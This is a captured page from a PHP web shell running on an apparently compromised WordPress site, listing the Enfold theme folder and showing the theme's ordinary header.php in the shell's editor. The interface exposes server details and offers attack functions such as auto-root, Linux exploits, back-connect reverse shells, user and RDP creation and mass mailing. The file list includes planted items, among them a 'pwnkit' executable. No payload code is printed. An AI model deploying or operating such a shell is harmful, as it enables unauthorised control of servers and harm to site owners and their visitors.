Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.121.20.2 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
5.4.45
urgencetin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
urgencetin /
www /
wp-content /
themes /
enfold /
[ HOME SHELL ]
Name
Size
Permission
Action
config-bbpress
[ DIR ]
drwxr-xr-x
config-events-calendar
[ DIR ]
drwxr-xr-x
config-gravityforms
[ DIR ]
drwxr-xr-x
config-layerslider
[ DIR ]
drwxr-xr-x
config-templatebuilder
[ DIR ]
drwxr-xr-x
config-woocommerce
[ DIR ]
drwxr-xr-x
config-wordpress-seo
[ DIR ]
drwxr-xr-x
config-wpml
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.php
72
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-more.php
181.05
KB
-rw-r--r--
archive.php
3.12
KB
-rw-r--r--
author.php
1.86
KB
-rw-r--r--
comments.php
4.98
KB
-rw-r--r--
conf.php
26.76
KB
-rw-r--r--
footer.php
6.18
KB
-rw-r--r--
forum.php
1.79
KB
-rw-r--r--
functions-enfold-interface.php
25.92
KB
-rw-r--r--
functions-enfold.php
57.34
KB
-rw-r--r--
functions.php
39.53
KB
-rw-r--r--
functions.php_bak
20.59
KB
-rw-r--r--
functions.txt
20.59
KB
-rw-r--r--
header.php
2.56
KB
-rw-r--r--
index-ajax-response.php
546
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
page.php
1.36
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
144.35
KB
-rw-r--r--
search.php
2.12
KB
-rw-r--r--
searchform.php
1.27
KB
-rw-r--r--
sidebar.php
3.66
KB
-rw-r--r--
single-portfolio.php
1.4
KB
-rw-r--r--
single.php
2.02
KB
-rw-r--r--
style.css
1.16
KB
-rw-r--r--
tag-statement.php
546
B
-rw-r--r--
tag.php
5.98
KB
-rw-r--r--
taxonomy-portfolio_entries.php
1.78
KB
-rw-r--r--
template-archives.php
7.35
KB
-rw-r--r--
template-blank.php
647
B
-rw-r--r--
template-builder.php
2.83
KB
-rw-r--r--
wpml-config.xml
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config; $style = $avia_config['box_class']; $responsive = avia_get_option('responsive_active') != "disabled" ? "responsive" : "fixed_layout"; $blank = isset($avia_config['template']) ? $avia_config['template'] : ""; $av_lightbox = avia_get_option('lightbox_active') != "disabled" ? 'av-default-lightbox' : 'av-custom-lightbox'; $preloader = avia_get_option('preloader') == "preloader" ? 'av-preloader-active av-preloader-enabled' : 'av-preloader-disabled'; $sidebar_styling = avia_get_option('sidebar_styling'); $filterable_classes = avia_header_class_filter( avia_header_class_string() ); $av_classes_manually = "av-no-preview"; /*required for live previews*/ $av_classes_manually .= avia_is_burger_menu() ? " html_burger_menu_active" : " html_text_menu_active"; ?><!DOCTYPE html> <html <?php language_attributes(); ?> class="<?php echo "html_{$style} ".$responsive." ".$preloader." ".$av_lightbox." ".$filterable_classes." ".$av_classes_manually ?> "> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <?php /* * outputs a rel=follow or nofollow tag to circumvent google duplicate content for archives * located in framework/php/function-set-avia-frontend.php */ if (function_exists('avia_set_follow')) { echo avia_set_follow(); } ?> <!-- mobile setting --> <?php if( strpos($responsive, 'responsive') !== false ) echo '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">'; ?> <!-- Scripts/CSS and wp_head hook --> <?php /* Always have wp_head() just before the closing </head> * tag of your theme, or you will break many plugins, which * generally use this hook to add elements to <head> such * as styles, scripts, and meta tags. */ wp_head(); ?> </head> <body id="top" <?php body_class($style." ".$avia_config['font_stack']." ".$blank." ".$sidebar_styling); avia_markup_helper(array('context' => 'body')); ?>> <?php if("av-preloader-active av-preloader-enabled" === $preloader) { echo avia_preload_screen(); } ?> <div id='wrap_all'> <?php if(!$blank) //blank templates dont display header nor footer { //fetch the template file that holds the main menu, located in includes/helper-menu-main.php get_template_part( 'includes/helper', 'main-menu' ); } ?> <div id='main' class='all_colors' data-scroll-offset='<?php echo avia_header_setting('header_scroll_offset'); ?>'> <?php if(isset($avia_config['temp_logo_container'])) echo $avia_config['temp_logo_container']; do_action('ava_after_main_container'); ?>
Close